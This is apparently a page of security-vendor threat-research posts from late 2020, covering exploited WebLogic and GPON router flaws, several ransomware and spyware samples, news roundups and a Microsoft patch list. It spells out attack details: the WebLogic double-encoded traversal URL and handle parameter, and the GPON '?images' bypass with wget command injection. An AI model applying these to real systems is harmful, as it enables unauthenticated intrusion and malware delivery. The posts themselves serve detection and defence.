Posts

CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

/in /by

SonicWall Capture Labs Threat Research team has observed that the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data via HTTP.

Oracle WebLogic is one of the widely used Java application servers. It helps building and deploying distributed web  applications for large enterprise web applications.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exist in Oracle WebLogic Server. The vulnerability is due to
improper validation of user supplied data in com.bea.console.utils.MBeanUtilsInitSingleFileServlet and
com.bea.console.handles.HandleFactory class.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using a HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet does not implement a proper mechanism to filter out the directory traversal
characters “..” nor does it check if the user is authenticated. As a consequence, an attacker can
access “/console/css/%252E%252E%252Fconsole.portal” where “%252E” is double url encoded value of “..”
to bypass the authentication and provide a request parameter containing the word “handle” where the
parameter value is the name of a Class that may be used maliciously and will be instantiated by the
com.bea.console.handles.HandleFactory class.

This exploit allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server by sending a crafted HTTP GET request. Successful exploitation results in the execution of arbitrary code under the security context of the user running WebLogic Server.

Exploit Requests

The following exploits are currently being used:

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2

 

Exerwa ransomware leaked from CTF hacker event

/in /by

The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. It is reported that Exerwa is CTF malware that emerged from a Capture-the-Flag event where hackers are tasked to build functional ransomware in the shortest possible time. Unfortunately, some code from this event has ended up in the wild. The code is very basic and the initial infection vector is via a word document using macros.

 

Infection Cycle:

 

Upon opening the Word document the following page is shown:

 

A .bat script can be seen on the second page:

 

Once the macro has run, the following files are dropped on to the system:

  • %USERPROFILE%\Exerwa\decode.bat
  • %USERPROFILE%\Exerwa\exec.enc
  • %USERPROFILE%\Exerwa\script.enc
  • %USERPROFILE%\Exerwa\exec.exe
  • %USERPROFILE%\Exerwa\script.ps1

 

script.enc contains the following encrypted data:

 

exec.enc contains the following encrypted data:

 

decode.bat is run.  It contains the following commands:

 

 

exec.enc is decrypted using the built-in Windows certutil program and exec.exe is created.  It is a non-malicious generic Xor encryption tool by Luigi Auriemma:

 

script.enc is decrypted with certutil and script.ps1 is created.  It contains the following powershell script:

 

This script contains a loop to encrypt files within a given directory using the Xor tool.  As shown in the script, “.exerwa” is appended to the names of encrypted files.

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Exerwa.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

LockDown ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs Threat Research team observed reports of a new variant family of LOCKDOWN ransomware actively spreading in the wild.

The LOCKDOWN ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <LOCKDOWN >
    • %App.path%\ [Name]. <bondy>
    • %App.path%\ [Name]. <Connect>
    • %App.path%\ [Name]. <sext>

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When LOCKDOWN is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [LOCKDOWN] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 11-20-20

/0 Comments/in /by

This week hackers targeted hardware and software, with attacks on WordPress sites, printers, CPUs and the popular game “Among Us” making headlines.

SonicWall in the News

SonicWall Stresses Zero Trust, Zero Touch in 2020 — ChannelPro Network

  • A look at SonicWall’s business strategy in 2020, particularly SonicWall’s Cloud Edge solution, its Boundless 2020 virtual event, and commentary from Bill Conner and Dmitriy Ayrapetov.

Best Firewalls For Small Businesses — Business Pundit

  • Business Pundit has recognized SonicWall’s TZ firewall as the “Best Overall Firewall.”

SonicWall Refreshes Low Ends of TZ and NSa Firewall Portfolios and Unveils Zero Trust SonicWall Cloud Edge Secure Access — ChannelBuzz

  • SonicWall adds Cloud Edge Secure Access solution and new TZ and NSa firewalls to its lineup.

Firewalls And ZTNA Solution Protect Working Environments — LANline

  • LANline offers a closer look at SonicWall’s new NSFirewalls and ZTNA solution news.

SonicWall Expands Cybersecurity with New TCO Firewalls — APN News

  • SonicWall announced the expansion of its Capture Cloud Platform with the addition of the high-performance NSa 2700 firewall, three new cost-effective TZ firewall options and SASE offering debut.

Industry News

The 10 Coolest Cybersecurity Startups Of 2020 — CRN

  • Perimeter 81, who teamed up with SonicWall to create the Cloud Edge Secure Access solution, made CRN’s list of Coolest Cybersecurity Startups of 2020.

Cybersecurity Industry in Detroit Is Growing and Mentors Are Starting With Young People — Detroit Free Press

  • In an article on how Detroit’s cybersecurity industry is growing, Bill Conner offers cybersecurity tips for remote work.

Egregor ransomware bombards victims’ printers with ransom notes — Threatpost

  • The Egregor ransomware uses a novel approach to get a victim’s attention after an attack: it shoots ransom notes from all available printers.

Bitcoin hits nearly three-year peak, homes in on record — Reuters

  • Bitcoin has soared to its highest level since December 2017 as the asset’s perceived quality as a hedge against inflation lured institutional and retail demand.

Trump fires CISA chief Chris Krebs, who guarded the 2020 election from interference and domestic misinformation — Cyberscoop

  • President Donald Trump on Tuesday said he had fired Chris Krebs, a widely respected Department of Homeland Security official who helped protect the 2020 election from hacking and disinformation, the latest in a series of purges.

Forget Imposters. Among Us Is a Playground for Hackers — Wired

  • James Sebree, a researcher for security firm Tenable, on Tuesday published a blog post laying out a slew of relatively simple, hackable vulnerabilities in Among Us.

Hackers are actively probing millions of WordPress sites — Bleeping Computer

  • Unknown threat actors are scanning for WordPress websites with Epsilon Framework themes installed on over 150,000 sites and vulnerable to Function Injection attacks that could lead to full site takeovers.

Ransomware Operator Promotes Distributed Storage for Stolen Data — Dark Reading

  • The criminals behind the DarkSide ransomware-as-a-service operation say the system will be harder to take down.

Hackers can use just-fixed Intel bugs to install malicious firmware on PCs — Ars Technica

  • Vulnerabilities allowed hackers with physical access to override a protection Intel built into modern CPUs that prevents unauthorized firmware from running during the boot process. Known as Boot Guard, the measure is designed to anchor a chain of trust directly into the silicon to ensure that all firmware that loads is digitally signed by the computer manufacturer.

In Case You Missed It

Attackers actively targeting vulnerable Dasan GPON home routers

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in Dasan GPON home routers. DASAN Zhone Solutions is a provider of  network access solutions for service provider and enterprise networks. The company provides a wide array of reliable, cost-effective networking technologies—including broadband access, Ethernet switching, Passive Optical LAN and software-defined networks.
Attackers are targeting following two vulnerabilities in GPON home routers:

Authentication Bypass Vulnerability
It is possible to bypass authentication simply by appending “?images” to any URL of the device that requires authentication. For example by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. Attacker can then manage the device.(CVE-2018-10561)

Command Injection Vulnerability
Command Injection vulnerability exists in Dasan GPON home routers via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI.The router saves ping results in tmp directory and displays them when user visits diag.html. This can be used to inject and execute commands.(CVE-2018-10562)

Following exploit is spotted in the wild

The attacker takes advantage of the above vulnerabilities to bypass authetication by appending “?images” to the POST request. Then the attacker downloads a malicious executable by injecting “wget”  command. This is saved in the tmp directory and is executed when a user visits diag.html page.

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 13340:Dasan GPON Routers Command Injection
    • GAV:Mirai.H

Threat Graph

IoCs:
59.99.45.126
117.213.46.186
117.194.165.174
112.27.124.174
42.234.109.14
2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6

A quick look at Shodan reveals thousands of vulnerable devices

Cybersecurity News & Trends – 11-13-20

/0 Comments/in /by

This week, SonicWall expanded its Capture Cloud Platform with four new firewalls and a new Zero-Trust security solution.

SonicWall in the News

SonicWall Expands Boundless Cybersecurity With New High-Performance, Low-TCO Firewalls; Company Debuts Cloud-Native Ztna Solution to Secure Work-From-Anywhere Environments — Company Press Release

  • SonicWall today announced the expansion of its Capture Cloud Platform with the addition of the high-performance NSa 2700 firewall, three new TZ firewall options, and SonicWall Cloud Edge Secure Access, which delivers easy-to-deploy, easy-to-use zero-trust security.

SonicWall Capture Advanced Threat Protection Collects ICSA Labs Certification — Company Press Release

  • For the third consecutive quarter, cloud-based Capture Advanced Threat Protection (ATP) sandbox service has been vigorously tested in the detection of today’s most evasive threats and awarded the coveted ICSA Labs Advanced Threat Defense certification.

The 2020 Tech Innovators Awards — CRN

  • SonicWall was recognized as the winner of the networking category for its TZ570 and TZ670 series (slide 22) and was a finalist in the security network category for its Network Security Services Platform 15700 (slide 37).

Cybersecurity Industry in Detroit Is Growing and Mentors Are Starting With Young People — Detroit Free Press

  • In an article on how Detroit’s cybersecurity industry is growing, Bill Conner offers cybersecurity tips for more secure remote work.

Four New SonicWall Firewalls Announced — Storage Review

  • Storage Review covers SonicWall’s latest launch, focusing on Cloud Edge Secure Access and four all-new firewalls.

SonicWall Research: Ransomware, IoT Malware Attacks On The Rise — MSSP Alert

  • In a feature article on SonicWall’s Q3 Threat Data, MSSP Alert spotlights the surge in ransomware and IoT malware.

Industry News

Campari Site Suffers Ransomware Hangover — ThreatPost

  • Italian spirits brand Campari has restored its company website following a recent ransomware attack.

Ragnar Locker Ransomware Gang Takes Out Facebook Ads in Key New Tactic — Threat Post

  • Following the Nov. 3 ransomware attack against Campari, Ragnar Locker group took out public Facebook ads threatening to release stolen data.

Pressure grows to reinstall White House cyber czar — The Hill

  • Pressure to reinstate a cyber czar within the White House is growing, with bipartisan allies lining up on Capitol Hill to push such a proposal.

Zoom settles charges with FTC over deceptive security practices — Cyberscoop

  • The FTC has reached a deal with Zoom to settle allegations that the communications technology company misrepresented its security and privacy protections.

How to Avoid Paying Ransomware Ransoms — Data Center Knowledge

  • As private experts and government officials advise against indulging the bad guys, here are some tips for following that advice.

Treasury Asks if External Cyber Acts Qualify for Terrorism Risk Insurance Program — Nextgov

  • A request for comment reflects recommendations made by the Cyberspace Solarium Commission.

Major ransomware strain jumps from Windows to Linux — SC Magazine

  • A recently discovered file-encrypting Trojan, built as an executable and linkable format (ELF), encrypts data on machines controlled by Linux-based operating systems.

Hospital network hit by cyber attack restoring services — The Washington Times

  • Computer experts at the University of Vermont Medical Center are working to restore systems disabled in a cyberattack that has affected the hospital’s ability to provide some cancer treatments.

Vietnamese hacking group OceanLotus uses imitation news sites to spread malware — Cyberscoop

  • Suspected Vietnamese government-linked hackers are behind a series of fake news websites and Facebook pages meant to target victims with malicious software.

Microsoft Exchange Attack Exposes New xHunt Backdoors — Threat Post

  • An attack on the Microsoft Exchange server of an organization in Kuwait revealed two never-before-seen PowerShell backdoors.

U.S. seizes over $1 billion in bitcoin tied to ‘Silk Road’ — Reuters

  • The U.S. Justice Department announced it had seized over $1 billion worth of bitcoin associated with the underground online marketplace Silk Road.

Ransomware Attacks Surge 40% Globally In Q3: Report — Express Computer

  • While overall malware volume declined for the third consecutive quarter, ransomware attacks globally surged 40% to reach 199.7 million hits in the third quarter of this year.

In Case You Missed It

Android spyware Bahamut spreads disguised as Voice of Islam app

/in /by

A spy campaign for Android was found spreading actively via the link – voiceofislam.info – which has been taken down. Cache page for this link shows weblinks which led the user to download a malicious apk file:

Original page images, posted on Twitter:

 

Infection cycle

Upon installation and execution, the app does not appear to perform a lot of activities to the user. In the background it contacts the attacker with device IMEI, this might be the registration mechanism usually observed in Android malware:

Contacts stored on the device are siphoned back to the attacker:

 

Spyware capabilities

This application contains a number of spyware components which aim at extracting sensitive user related information and sending it back to the attackers server – voiceofislam.info

Call logs:

 

Contacts:

 

Device information:

 

Media files with support for a number of extensions:

Interestingly the spyware has support for .crypt11 and .crypt12 file extensions which are encrypted Whatsapp chat history databases.

 

Location:

String encryption

This malware uses Blowfish encryption to encrypt strings using the key 9;_R%@c`gZxL9M{j”. This key has been linked with the Android spyware campaign Bahamut.

 

Network investigation

We observed the following VT graph for the domain voiceofislam.info:

The second malicious app identified from this graph – 6ef7ea19a000f2570c30ae3814b8482f – contains similar functionality as the one analyzed.

Upon further digging, we found another app related to this campaign via Koodous:

 

This app  ( MD5 – 9368dd657e410f8a9ba2b71c95cc0777) contains a similar code and component structure related to the previous app, but with a minor change. It uses a secret key K&M9B#)O/R\u0007=P%hA which again coincides with the known keys associated with Bahamut campaign.

Overall this malicious spyware aims at stealing sensitive user information from the infected devices. This malware is part of a larger campaign Bahamut, we can expect more spyware from this campaign to spread using different means in future.

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOSBahamut.NS (Trojan)
  • GAV: AndroidOSBahamut.SM (Trojan)

 

Indicators of Compromise (IOC):

Microsoft Security Bulletin Coverage for November 2020

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-16998 DirectX Elevation of Privilege Vulnerability
ASPY 5907:Malformed-File exe.MP.131

CVE-2020-17010 Win32k Elevation of Privilege Vulnerability
ASPY 125:Malformed-File exe.MP.165
CVE-2020-17038 Win32k Elevation of Privilege Vulnerability
ASPY 124:Malformed-File exe.MP.164

CVE-2020-17047 Windows Network File System Denial of Service Vulnerability
IPS 15220:Windows Network File System Denial of Service (CVE-2020-17047)

CVE-2020-17051 Windows Network File System Remote Code Execution Vulnerability
IPS 15223:Windows Network File System Remote Code Execution (CVE-2020-17051)

CVE-2020-17052 Scripting Engine Memory Corruption Vulnerability
IPS 15221:Scripting Engine Memory Corruption Vulnerability (CVE-2020-17052)

CVE-2020-17053 Internet Explorer Memory Corruption Vulnerability
IPS 15222:Internet Explorer Memory Corruption Vulnerability (CVE-2020-17053)

CVE-2020-17056 Windows Network File System Information Disclosure Vulnerability
IPS 15226:Windows NFS Information Disclosure (CVE-2020-17056)

CVE-2020-17057 Windows Win32k Elevation of Privilege Vulnerability
ASPY 123:Malformed-File exe.MP.161

CVE-2020-17061 Microsoft SharePoint Remote Code Execution Vulnerability
ASPY 126:Malformed-File exe.MP.166
IPS 15224: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 1
IPS 15225: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 2

CVE-2020-17087 Windows Kernel Local Elevation of Privilege Vulnerability
ASPY 117:Malformed-File exe.OT.1
GAV:CVE-2020-17087

CVE-2020-17088 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 122:Malformed-File exe.MP.160

Following vulnerabilities do not have exploits in the wild :
CVE-2020-1325 Azure DevOps Server and Team Foundation Services Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1599 Windows Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-16970 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16979 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16981 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16982 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16983 Azure Sphere Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-16984 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16985 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16986 Azure Sphere Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16987 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16988 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16989 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16990 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16991 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16992 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16993 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16994 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16997 Remote Desktop Protocol Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16999 Windows WalletService Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17000 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17001 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17004 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17005 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17006 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17007 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17011 Windows Port Class Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17012 Windows Bind Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17013 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17014 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17015 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17016 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17017 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17018 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17019 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17020 Microsoft Word Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17021 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17024 Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17025 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17026 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17027 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17028 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17029 Windows Canonical Display Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17030 Windows MSCTF Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17031 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17032 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17033 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17034 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17035 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17036 Windows Function Discovery SSDP Provider Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17037 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17040 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17041 Windows Print Configuration Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17042 Windows Print Spooler Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17043 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17044 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17045 Windows KernelStream Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17046 Windows Error Reporting Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17048 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17049 Kerberos Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17054 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17055 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17058 Microsoft Browser Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17060 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17062 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17063 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17064 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17065 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17066 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17067 Microsoft Excel Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17068 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17069 Windows NDIS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17070 Windows Update Medic Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17071 Windows Delivery Optimization Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17073 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17074 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17075 Windows USO Core Worker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17076 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17077 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17078 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17079 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17081 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17082 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17083 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17084 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17085 Microsoft Exchange Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17086 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17090 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17091 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17100 Visual Studio Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-17101 HEIF Image Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17102 WebP Image Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17104 Visual Studio Code JSHint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17105 AV1 Video Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17106 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17107 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17108 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17109 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17110 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17113 Windows Camera Codec Information Disclosure Vulnerability
There are no known exploits in the wild.

Cybersecurity News & Trends – 11-06-20

/0 Comments/in /by

This week, there were no reports of cybercriminal meddling in the U.S. election. But hospitals, government agencies, human rights groups, embassies and more weren’t so lucky.

SonicWall in the News

FBI Warns That Hackers Are Targeting Hospitals While Coronavirus Admissions Surge — Vox

  • The FBI has warned of an increase in ransomware attacks, particularly Ryuk, on hospitals.
    * Syndicated on MSN

Ryuk This For A Game Of Soldiers: Ransomware-flingers Actively Targeting Hospitals In The Us, Cyber Agencies Warn — The Register

  • While countries such as the UK, Germany and India saw declines in Ryuk, the U.S. saw a staggering 145.2 million ransomware hits – a 139 per cent year-on-year increase.

Surge In Ryuk Ransomware Attacks Has Hospitals On Alert — Computer Weekly

  • Ryuk has surged during 2020, according to statistics provided by SonicWall’s Capture Labs, which has booked 67.3 million Ryuk attacks in 2020, one-third of all ransomware incidents so far this year.

Most Organizations Don’t Have An Election Cyber War Room. They Don’t Need One — Cybersecurity Dive

  • The latest technological developments are almost irrelevant if security is absent from company culture. It’s a matter of reminding organizations of their security hygiene.

Industry News

Officials on alert for potential cyber threats after a quiet Election Day — The Hill

  • Election officials are cautiously declaring victory after no reports of major cyber incidents on Election Day.

Scam PSA: Ransomware gangs don’t always delete stolen data when paid — Bleeping Computer

  • Ransomware gangs are increasingly failing to keep their promise to delete stolen data after a victim pays a ransom.

No indication foreign governments have successfully interfered with 2020 voting: DHS officials — The Washington Times

  • Department of Homeland Security officials said the federal government is confident that the nation’s voting systems are secure and unaffected by foreign interference, but they cautioned that America’s adversaries may still attempt to create problems.

UK cyber-threat agency confronts Covid-19 attacks — BBC

  • More than a quarter of the incidents which the UK’s National Cyber Security Centre (NCSC) responded to were COVID-related, according to its latest annual report.

Hacker is selling 34 million user records stolen from 17 companies — Bleeping Computer

  • A threat actor is selling account databases containing an aggregate total of 34 million user records that they claim were stolen from seventeen companies during data breaches.

North Korean Group Kimsuky Targets Government Agencies With New Malware — Security Week

  • North Korea-linked threat actor Kimsuky was recently observed using brand new malware in attacks on government agencies and human rights activists, Cybereason’s security researchers say.

Hackers Bearing Down on U.S. Hospitals Have More Attacks Planned — Bloomberg

  • A Russia-based ransomware group responsible for a new wave of attacks against U.S. hospitals is laying the groundwork to cripple at least ten more.

First the Good News: Number of Breaches Down 51% Year Over Year — Dark Reading

  • But the number of records put at risk experiences a massive increase.

US shares info on Russian malware used to target parliaments, embassies — Bleeping Computer

  • US Cyber Command today shared information on malware implants used by Russian hacking groups in attacks targeting multiple ministries of foreign affairs, national parliaments, and embassies.

Hackers are on the hunt for Oracle servers vulnerable to potent exploit — Ars Technica

  • Hackers are scanning the Internet for machines that have yet to patch a recently disclosed flaw that force Oracle’s WebLogic server to execute malicious code, a researcher warned Wednesday night.

In Case You Missed It

Ragnar Locker Ransomware

/in /by

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Ragnar Locker Ransomware.

Cyberattacks using Ragnar Ransomware have impacted Biological E Ltd, Capcom, and Campari Group.
A description of the corporations that were hit last week and this week are below:

  • Biological E limited is a privately held biopharmaceutical company based in Hyderabad, Telangana, India.
  • Capcom Co., Ltd. is a Japanese video game developer and publisher.
  • Campari, is an Italian company active since 1860 in the branded beverage industry. It produces spirits, wines, and soft drinks.

Ragnar injects a module capable of collecting sensitive data from infected machines and uploads the data it finds to their servers. The ransomware notifies the victim of the files that will be released to the public if the ransom is not paid.

Ransomware document:

Further down the document:

Ragnar Key is at the bottom of the document:

Static Layer, Information:

Overview of sample, checking for any corruption within the PE file format.

Command-Line overview of sample:

Dynamic Information:

Shellcode Buffer:

Shellcode Entry:

Some Shellcode Functionality:

Anti-Debugging Block:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: RagnarLocker.RSM_2 (Trojan)

Appendix:

Sample SHA256 Hash: 0766beb30c575fc68d1ca134bd53c086d2ce63b040e4d0bbd6d89d8c26ca04f6